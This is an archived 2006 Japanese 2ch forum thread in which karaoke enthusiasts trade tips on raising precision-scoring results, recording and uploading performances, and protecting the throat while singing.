133 :選曲してください:2006/07/20(木) 19:56:11 ID:zDJqiFD+
>>132
とりあえずランバトは精密採点の結果の点数で比較されているので
いずれにせよ精密採点で点数が取れれば良い
(ランバトにも効果が出る)
って事になるよね。

採点の要素は加点要素減点要素混じった説明になってしまうが
・音程が正しく(ガイドメロディ通りに)歌えた音の割合。
 リズムが狂うと節回しとしての音程が合っていても
 その瞬間ごとの出すべき音程からは外れるので
 点の取りこぼし、酷ければ減点対象になるっぽい。注意
・リズム。演歌の場合「タメ」が許されるらしいが
 POPSだと走りも遅れもタメも減点対象になる感じ。
・ビブラート。かければかけるほど加点 しかし上限があるっぽい
 またはビブラートによる加点計算の後その他の減点要素で
 最終的には無効化される部分が出てくる
 ビブラートランプが付いていてもそのために音程が外れてしまっては意味がない
・抑揚。これが諸説ある部分
 ダイナミクスレンジの幅 声量の幅
 弱く歌う部分は弱く、盛り上げる部分はマイクを壊す勢いで
 (しかしリズム音程が狂うと意味がなくなる
 マイクが口に近すぎると良くないとの意見も
 ワイヤレスマイクだと充電残量の影響を受ける

って位か。
うpってくれたら96,97台へのアドバイスくらいならしてやれるけどね
その先は俺が聞きたいわ(w

134 :選曲してください:2006/07/21(金) 02:59:49 ID:lbHHLXAl
>>133
遅レスですが、ありがとうございます!!
普段は音程とビブラート程度しか意識していませんでしたが、
抑揚なんてほとんど・・・今度から考えてみます。
リズムも正確でない可能性もあるから、
対象の曲のガイドメロディを一度聴くと違うでしょうか?

実はこちらの板にカキコするのは初めてで、
upったことなんてありません・・・興味はありますが。
皆様はどのように録音していらっしゃるのでしょうか?

135 :選曲してください:2006/07/21(金) 06:42:34 ID:yYay2W4t
>>134
そーですか
ガイドメロディーはむしろ頭に叩き込むぐらいの方が良いかもですよ
意外と原曲からズレがあるらしーですからね

録音→うpは
もっと丁寧に録音、うpの仕方教えれ!! 2
http://music4.2ch.net/test/read.cgi/karaok/1134364148/
ここの方が早いか 某女神のサイト
ttp://tryout.xxxxxxxx.jp/karaoke/

俺はノートをオケ屋に持ってって
カラオケ屋の機械→ピンプラグ→「オーディオインタフェース」→USB→ノート
と繋いでますけどね

136 :選曲してください:2006/07/21(金) 09:19:40 ID:jCK6zvk2
>>104
98,99点取れる人は別にして、96,97点あたりだ最高の自分は
経験でいくと、月初めに高得点を出しておく、先行逃げ切り型が
いいと思う。
追い上げ方は大変。

137 :選曲してください:2006/07/22(土) 03:53:55 ID:BNWisbjT
>>135
また遅くなってしまった・・・
本当にありがとうございます。

ノートは持っていないので別の方法を探しますが、
近いうちにupできればいいかと思います。
その時はまたよろしくお願いします。

138 :塩尻のアニメ女王:2006/07/22(土) 15:34:00 ID:BSMN8Icg
>>119
遅くなりましたけど、マイデンモクで写真を取らないときに
自分として使うキャラクターのことです。
今は「考える人」や「モナリザ」もあってびっくりしました。
鯛もあります。
前のが可愛くてよかったけど、下の3つのキャラクターが
どうかな?と思っていただけです。

139 :選曲してください:2006/07/24(月) 03:19:04 ID:9YRNRxMm
f-stageとかいう最新っぽい機種、ライン録音ができないように端子のトコ
ガードしてあった。めっちゃショック、、、。


140 :選曲してください:2006/07/24(月) 09:24:55 ID:/yknH+me
壁にぶつかって、なかなか得点が上がらないとき、
半音上げたり、下げたりすると、準高得点95、6、7点程度が
出るときがある。
また、普段あまり唄わない歌を唄うと、意外と点数が出るときが
ある。

141 :選曲してください:2006/07/25(火) 11:09:08 ID:TKIZ2BDM
はりきってヒトカラ行ったらいつも歌う曲の映像が消えてた
       ||
     ∧||∧
    ( / ⌒ヽ
     | |   |
     ∪ / ノ
      | ||
      ∪∪
       :
      -====-

      -====-


142 :選曲してください:2006/07/25(火) 13:06:59 ID:xFb3/BSG
>>141
本人映像の曲ならHDDが飛んでる。
部屋を変えて貰うべし。

143 :塩尻のアニメ侍女:2006/07/26(水) 11:07:55 ID:ThAi1tR4
カラオケを唄いすぎると、どうしても喉を痛めますよね。
わたしは、つぎのようにしていますが、みなさまはどうしておられるでしょうか。
教えてください。
@のど飴をしようする
Aうがい薬をしようする
Bつづけて唄わない(1曲と1曲のあいだに休憩時間をもつ)

144 :選曲してください:2006/07/26(水) 14:27:07 ID:JBaGXR9c
>>143、無駄な地声や無駄な発声は喉痛めるぞ、オイラも昔そうだったが、今では、飲み物二杯で5時間全力で歌い上げても大丈夫。

145 :選曲してください:2006/07/26(水) 21:42:06 ID:imAexfb7
>>143
Bに近いんだけど、
出来るだけ腹式呼吸を心がけるのも大事だね。
あと、喉の乾燥には気を付けてる。


146 :選曲してください:2006/07/27(木) 21:52:28 ID:DphumuO6
お腹から自然に押し出すような発声だとあまり喉に
負担がかからない。
訓練が必要だけど。

38 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)